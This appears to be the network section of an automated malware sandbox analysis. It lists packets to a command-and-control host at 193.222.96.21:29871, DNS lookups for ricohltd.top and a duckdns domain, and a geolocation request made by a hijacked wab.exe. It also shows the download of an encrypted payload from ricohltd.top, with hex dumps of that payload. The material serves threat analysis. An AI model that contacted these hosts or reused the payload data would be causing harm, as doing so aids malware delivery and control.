                                                                                            Apr 19, 2024 19:12:13.339081049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339099884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339107990 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339117050 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339127064 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339135885 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339154005 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339164972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339170933 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339188099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339205980 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339206934 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339222908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339241982 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339250088 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339257956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339272022 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339277029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339293957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339312077 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339318991 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339329004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339339972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339345932 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339364052 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339373112 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339380026 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339399099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339411020 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339416981 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339433908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339449883 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339457989 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339467049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339476109 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339484930 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339502096 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339512110 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339519978 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339536905 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339555979 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339562893 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339572906 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339582920 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339591026 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339607954 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339626074 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339632034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339644909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339651108 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339664936 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339721918 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:15.843961000 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:16.046437025 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.046947956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.047183037 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:16.249686956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.249718904 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.256575108 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.257318020 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:26.536947966 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:26.538985014 CEST4973829871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:26.782613993 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:56.585899115 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:56.588608980 CEST4973829871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:56.844500065 CEST2987149738193.222.96.21192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 19:12:07.224807978 CEST | 63072 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 19:12:07.550573111 CEST | 53 | 63072 | 1.1.1.1 | 192.168.2.4
Apr 19, 2024 19:12:10.912658930 CEST | 49646 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 19:12:11.058248043 CEST | 53 | 49646 | 1.1.1.1 | 192.168.2.4
Apr 19, 2024 19:12:11.704798937 CEST | 61355 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 19:12:11.813088894 CEST | 53 | 61355 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 19:12:07.224807978 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc59 | Standard query (0) | ricohltd.top | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:12:10.912658930 CEST | 192.168.2.4 | 1.1.1.1 | 0xa31c | Standard query (0) | learfo55ozj01.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:12:11.704798937 CEST | 192.168.2.4 | 1.1.1.1 | 0x1837 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 19:12:07.550573111 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc59 | No error (0) | ricohltd.top | | 104.21.60.38 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:12:07.550573111 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc59 | No error (0) | ricohltd.top | | 172.67.191.112 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:12:11.058248043 CEST | 1.1.1.1 | 192.168.2.4 | 0xa31c | No error (0) | learfo55ozj01.duckdns.org | | 193.222.96.21 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:12:11.813088894 CEST | 1.1.1.1 | 192.168.2.4 | 0x1837 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

• ricohltd.top
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | 7812 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 19:12:12.021416903 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 19, 2024 19:12:12.231025934 CEST | 1171 | IN | HTTP/1.1 200 OK
date: Fri, 19 Apr 2024 17:12:12 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 104.21.60.38 | 443 | 7812 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:12:09 UTC | 177 | OUT | GET /PIoDroeALMbPB243.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: ricohltd.top
Cache-Control: no-cache
2024-04-19 17:12:09 UTC | 849 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 17:12:09 GMT
Content-Type: application/octet-stream
Content-Length: 494656
Connection: close
Last-Modified: Wed, 17 Apr 2024 09:41:32 GMT
ETag: "661f994c-78c40"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
CF-Cache-Status: HIT
Age: 77445
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWQ%2F8IEGKBh2SEWerGu%2FUQOYwUmRr%2B6YdOzIanpJFqg%2BqQXHwBekXQkUlYc%2BlhpMDBg5fwtLiG1chOcAqRbJxc%2BPm%2FjopivVGOA4lQm9w%2FceKgckouABgIkmiXG5CIM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 876e84926e8f53b7-ATL
alt-svc: h3=":443"; ma=86400
2024-04-19 17:12:09 UTC | 520 | IN | Data Raw: 10 a2 6f df 8f 9f 3f 7f 57 12 0b 45 2a 66 83 11 48 fd 5f fc 6d ba f0 98 e9 20 e3 8f 6d 1f 38 dc 69 d3 d9 02 e9 c3 ee 5e 80 9c 4f ed f7 cc 87 fd 8c 09 1f c0 c3 90 cf a0 3d a6 e3 fe c4 1d f4 9e eb 24 00 70 02 00 70 48 1a d2 61 c6 ad 90 b6 cb ad 89 c7 04 79 65 e1 81 17 f9 62 98 a2 37 b9 a0 11 07 df ca c1 0a 29 23 05 62 d6 2e 49 db ae 39 d9 c9 34 7c 47 39 e1 c7 0d ae 12 3c de 41 0c 36 a3 a2 7a 5f e9 bd 3c 60 d8 b1 b5 96 c0 9e 44 00 56 b8 14 de 22 35 a5 08 5e 4a dc ab 4d b9 ee be f7 e5 69 62 22 ad a6 fa 36 a1 ef 92 ca 09 c4 f0 d0 81 53 fa a9 3c a3 53 0e 22 af e5 32 6c 40 6a b2 7c 9a 3a d6 54 b8 6f 63 36 c1 1e 52 7b c7 ed ca 77 55 bd cf a9 60 aa 8f 0e b9 63 48 92 47 0e 71 b8 9d 53 6b 19 89 f7 ec ff 1e c8 c1 bb 58 ef f9 b9 79 27 bb 66 b2 8f 6e 60 58 9b 0d f1 54
Data Ascii: o?WE*fH_m m8i^O=$ppHayeb7)#b.I94|G9<A6z_<`DV"5^JMib"6S<S"2l@j|:Toc6R{wU`cHGqSkXy'fn`XT
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: 42 f8 c5 2f 7d af 31 7d 1c 24 42 01 a0 75 f0 b6 97 6f 68 8d 59 69 17 35 a1 03 7c 27 6c bb f4 5f 41 92 12 90 6d f5 9c b7 6a 34 b3 3a f7 f4 14 0d 71 c5 79 22 f4 99 32 6a 8e 64 ec 89 a6 50 c7 5d 47 b9 06 55 00 ac 9b 93 b6 e7 a8 37 10 87 e7 fa cc 2c 9f 9f a6 c3 28 3a fd 44 a0 a6 bc ec cb b1 98 0a 8a 10 cd 5f 9f 0f 99 a4 eb 03 da 60 68 d1 36 b7 06 fd 32 e2 4c db 71 3c 09 9e 86 b7 5f 56 34 f7 ed 43 5e a4 37 ef 2a af 69 8e 6a 00 78 da ee d7 0a e3 bd cb 1d 0b 7d 47 5b f0 dd 68 d9 77 1a 7c 0a a4 8c 70 64 89 b4 75 30 21 b4 6c db 4a 41 ad 60 57 1d b6 07 43 fd bc 4c d6 a1 02 89 8f d5 17 3c 8a 79 01 e2 2e 98 f2 d9 75 dc c6 04 10 79 20 b8 0b 61 8b 13 3a 75 dc f3 ea 71 92 39 74 19 b1 94 42 a1 27 df f2 0b 86 72 9a 6b 52 fa ef 89 ca 51 4c cd a1 7d 79 05 a8 c6 f7 d6 6c 2a
Data Ascii: B/}1}$BuohYi5|'l_Amj4:qy"2jdP]GU7,(:D_`h62Lq<_V4C^7*ijx}G[hw|pdu0!lJA`WCL<y.uy a:uq9tB'rkRQL}yl*
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: a3 bb 29 0e 5b 18 86 94 df 77 72 e5 8a e1 8c 98 5f bd b7 75 69 e2 4d 8c 8f cd 6f 31 92 29 1d b6 6f e0 74 f9 4c 3e 84 46 8d 8f 8c d6 85 f2 2c b8 e4 c6 10 ff d9 75 b4 6b 84 55 79 c8 b7 3f 22 8b 4a 39 31 bb 2c 7b 41 a6 39 9c a1 80 94 42 c9 10 58 b7 0b 6a 85 a9 68 52 a4 2c e3 ca e8 d4 98 e6 7d 91 75 9b c6 f7 fe ad aa 81 cc ce d4 47 65 32 e2 95 a1 91 33 56 37 d1 d0 dd 95 5b 15 5b 73 ec 35 c6 93 0e 71 18 5b 22 5b a4 be 08 f0 24 f1 cd ee 03 df 26 e8 ec 58 ab 2c e2 fd 67 e0 77 46 ae 2c cf f5 c8 f2 d4 3e 43 19 4e f9 ca ba 09 e1 14 4b 93 25 4e ec e7 48 f5 75 fc 79 34 26 35 ce 21 43 c0 d8 25 75 5f 6f a5 07 40 fd c2 16 0d bb 79 c9 1f fc b0 e6 d8 01 8b 86 ea 8a 1b fb dc 90 47 e4 65 f2 af 39 be 56 45 39 bd 10 e0 35 4b ed df 01 94 a9 89 fc d9 c4 96 e2 51 f6 61 53 66 76
Data Ascii: )[wr_uiMo1)otL>F,ukUy?"J91,{A9BXjhR,}uGe23V7[[s5q["[$&X,gwF,>CNK%NHuy4&5!C%u_o@yGe9VE95KQaSfv
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: 6b ab a7 82 89 37 ce 30 ae 51 49 ff 2e c6 8e ee 55 bd 49 2d 3f ce 52 2c d2 6a 64 45 2a a5 ee e7 f6 89 00 d4 7a 6d 66 b1 fe 1c 43 c0 cf 3e 73 44 3c 46 21 28 fd ec fe 73 e0 4a b6 03 3f e1 ca a1 45 8b 37 90 11 fe d1 b7 63 9e 2c 29 3e d7 e2 af 5e 1c fa 5e 65 24 5e f5 86 9f c9 dd 2d 0c e8 a9 56 9b 61 e9 08 7b 6a 82 32 f1 85 e5 41 ee 7d 6d 22 91 3c a5 e1 6f 4d 55 a1 5b fb 93 bd e3 54 d0 14 90 e1 bf 63 b2 04 38 59 d6 ca bc 49 8c 94 3b 1c 15 fb b3 e0 c7 43 72 c8 c5 61 c2 d0 61 f7 2d 98 ba fa 6f 5d 69 1c 73 80 5c 92 e3 4f dc 1b 0e 6c c4 19 57 8d 19 32 d0 1e 21 40 ac a3 e4 d5 96 d5 bc 8f 51 a2 b1 64 42 8f 49 55 ad 8c fc ed af 9a 3e 5d 0d fc a5 63 e3 42 2e 4d be 81 40 16 fd 3a a2 1f 78 21 6a 66 76 58 a2 61 40 b9 8f 6d c0 f3 ea 95 cf e9 03 19 bd de 04 6f d3 62 b7 28
Data Ascii: k70QI.UI-?R,jdE*zmfC>sD<F!(sJ?E7c,)>^^e$^-Va{j2A}m"<oMU[Tc8YI;Craa-o]is\OlW2!@QdBIU>]cB.M@:x!jfvXa@mob(
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: 04 9a 75 48 45 16 5d 2d d3 53 1a 6c 04 1a 49 0c c3 50 90 b4 db b4 25 ce cd 2e 6c c4 19 51 c9 b6 34 38 6a dd 57 2d ce c4 83 39 b6 c6 3d 5b e5 4e fc 8a 3f b4 55 14 f0 59 4f ba 72 a7 05 86 2c 42 cf 64 56 04 0a be c8 c2 29 ba 3a ad 6b 9d 6c cc 05 f6 fb 2e 4b ef 1f a9 ad 63 3a 4b 02 42 06 b3 57 12 f5 b2 f7 f9 7c 3c 5b 23 73 94 d2 d7 75 79 4f 62 78 4c 8c b8 b7 25 c9 ef 81 8b d1 b8 3c ee b0 e4 21 0b fd 27 eb f2 31 d5 f2 6a e6 47 b9 e5 77 02 a5 62 dd e8 1a a3 2b 4e 7a 25 12 29 49 bb 97 91 75 e3 2b 7e 2b 80 fc f0 ec 0c e8 fa 48 3c 7a 82 e9 48 5d 74 f1 e5 98 87 9d cd f6 8e e1 85 27 fd a5 b9 93 31 df 1b 7b 65 10 9f 04 a6 6d 0c d9 33 91 b5 1a d3 24 72 43 41 d6 08 87 65 c8 a7 11 7d 81 5d cd ce 62 ae 7b b8 1f 24 2c 4e b2 be ac 56 44 41 11 82 f4 51 59 1b 59 b8 4c 20 3a
Data Ascii: uHE]-SlIP%.lQ48jW-9=[N?UYOr,BdV):kl.Kc:KBW|<[#suyObxL%<!'1jGwb+Nz%)Iu+~+H<zH]t'1{em3$rCAe}]b{$,NVDAQYYL :
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: 97 a0 a0 0a d5 79 68 e3 76 79 b2 d6 a8 7a 48 c8 0d 94 77 42 ad db 5e bd 44 b7 bb cb 05 c3 7a 3b 8e e5 90 38 57 f4 13 70 1e c2 6b 88 a1 e8 f0 72 6c fb 86 cb bc 99 d8 e4 e0 21 9a 94 23 a2 f2 0f 18 65 20 c0 12 04 3d a5 d6 68 ec 82 fa 16 49 67 2a 9d 6f 7b b3 50 1d f6 db b6 a1 56 cf 10 a9 60 2e b9 d8 bc 2d 89 2f 81 d0 8e 70 f4 5f dc 8a 59 b9 16 57 98 c1 33 b5 a2 50 d5 cc 97 ab 21 f8 07 60 be 04 1b 10 df 91 51 eb 83 c7 b3 22 68 90 ee 5c e8 9e 8a 82 d6 ea 7e 5c 5a f2 91 a5 d8 8c 09 f6 f4 30 da 5a 94 70 57 8b 81 3c 4c 81 89 6b 51 6f b6 40 cd 0a fc 14 0b 21 b4 0a 99 11 3b 65 5d c8 3a dc 35 13 df 41 29 81 6c 23 8c 26 f2 3e 3f ce 51 4d fd dd 64 94 cb 35 e1 c7 54 fe 47 d4 d5 b2 f3 c9 2e 79 cc da ea 82 fb ed a9 f6 c0 fe 19 57 e2 95 c0 34 bf 66 b8 25 c1 7a 3f 7a a7 43
Data Ascii: yhvyzHwB^Dz;8Wpkrl!#e =hIg*o{PV`.-/p_YW3P!`Q"h\~\Z0ZpW<LkQo@!;e]:5A)l#&>?QMd5TG.yW4f%z?zC
2024-04-19 17:12:09 UTC | 1369 | IN | Data Raw: c0 f1 a2 f3 86 3f 13 28 2e 34 0d 7f b0 9d 3a b4 78 73 04 2e 8a 1a d2 ea 08 ba 6f b2 cb 15 45 af 48 27 23 e1 69 8a d0 61 98 6e b4 c5 84 15 07 8c 41 18 7e 00 cb 8d 9b 29 d1 70 9f 8a 31 ab d7 62 f7 8c d1 9b 3e f2 51 99 f7 5d b0 e4 5e 54 42 3f 52 d9 32 41 89 f5 57 c2 de bd be fb 6a 0d 0b 6f 6c 54 5a 94 2d b4 de 14 34 28 d7 80 5a f7 e1 07 8c cd e4 15 e6 4e 20 0a 4c 71 b9 ae e0 ce fd bc 50 6f 03 57 a6 d5 a9 60 1a 02 3a a8 f3 d5 e7 21 fc c4 2e 11 35 53 cc 60 7f f1 7f 02 e0 44 9a be 2b ef aa 4a 2b 90 a7 14 1d f4 98 9d 32 23 8e d0 2c bd 70 a6 76 3a 96 43 33 16 34 87 c7 cc 2c 83 49 99 9c 67 74 15 9b 81 71 f7 55 43 57 0a 17 54 f4 f0 ba e0 aa b9 dd d9 3e a6 6c 42 e9 5f 6b 4d 03 24 a6 fc f4 9e 24 23 58 0a 44 6c 47 da 14 26 eb 8e 4c ed 95 45 a0 4c 6c 69 ed 68 a3 d3 f4
                                                                                            Data Ascii: ?(.4:xs.oEH'#ianA~)p1b>Q]^TB?R2AWjolTZ-4(ZN LqPoW`:!.5S`D+J+2#,pv:C34,IgtqUCWT>lB_kM$$#XDlG&LELlih
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 24 ff 95 8d 7e 78 93 34 11 99 f9 9f 50 b5 18 4a 97 ab 39 27 75 66 8f 1a 55 72 c5 18 e3 5c 89 f6 af 0d 8d 22 cc c5 6e 48 a5 a1 d2 58 c5 a4 9b e1 3b fa c0 3b f4 f5 7b 06 17 81 e3 f0 ba af 3b 3e f3 80 68 24 dd 45 62 84 ec c7 7f 8d e7 eb 21 fd 13 1a 9e 31 48 27 3f ca 15 24 15 71 b3 bf bb 0b 48 9d 80 cf d0 35 fa 64 58 03 66 77 2e a0 ad 0d 60 62 35 33 5c 6a c2 33 c0 46 ca 67 aa 20 15 5d d6 e3 30 83 1f 08 52 96 67 4f 4c ee a1 0e 6e 3d a2 b4 df d4 1f 20 eb bc 37 5d 5c 7e 27 08 77 96 8c d0 f4 68 03 d0 d4 61 71 60 b0 c8 25 c7 cd 61 6a f3 61 f3 f4 6a e3 0a e6 38 7a c3 71 ce 45 25 c6 a4 99 50 87 ea e7 c6 81 ef 35 e1 29 47 3f 03 59 ac aa d0 1f 6e 58 d2 fd 39 eb ee 20 97 e6 21 65 63 59 7b 5c 89 82 01 77 29 23 0b d6 1f ed 91 5f 6b 13 72 b7 d5 fd 68 a1 f9 88 b1 e6 b2 34
                                                                                            Data Ascii: $~x4PJ9'ufUr\"nHX;;{;>h$Eb!1H'?$qH5dXfw.`b53\j3Fg ]0RgOLn= 7]\~'whaq`%ajaj8zqE%P5)G?YnX9 !ecY{\w)#_krh4
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 64 0e 4f 91 31 96 c7 ef d8 e4 4a e8 73 64 57 38 cf 91 e4 9e 1f 31 4c c3 cd e0 8d 0c 9e 20 bb a8 c9 d6 e5 80 85 b7 48 ef 0d 43 53 99 4a 03 b8 43 06 1c f5 72 46 7a b3 47 74 f2 a6 53 e3 13 94 77 85 fd f7 39 9f 21 78 b7 79 03 ae e0 99 07 2a be 79 fe c7 ee de 6f 79 d4 2e e5 7b 6c 2e fd 78 b7 e3 7f fc f3 9e c8 68 79 1f 13 c7 ae 3e a5 f0 7e 00 c7 aa 18 03 5c 70 cf 51 39 04 31 66 2d 24 f8 ea d2 57 a0 55 4f 0e 3a f4 09 63 d4 c7 74 24 b3 10 c1 82 18 74 49 9c 8c 7d 34 29 88 4b 9a ea b2 e7 5a 63 4b 92 0d 0d de 91 96 2b 2a dd 65 af 31 2e ef ab 60 11 b5 26 18 23 63 90 97 72 2d 4d 0f be 6f c0 91 e3 65 40 0b d4 8f 19 ca 78 58 1b 63 48 e1 58 97 1a 7c 39 9d 49 55 dd 8e f3 7f 99 b9 ba 8b c3 b2 3b dd d6 7b 5d 32 c8 28 11 24 a8 b0 50 3f d1 89 17 2b 68 94 d1 9c a7 51 77 54 2e
                                                                                            Data Ascii: dO1JsdW81L HCSJCrFzGtSw9!xy*yoy.{l.xhy>~\pQ91f-$WUO:ct$tI}4)KZcK+*e1.`&#cr-Moe@xXcHX|9IU;{]2($P?+hQwT.
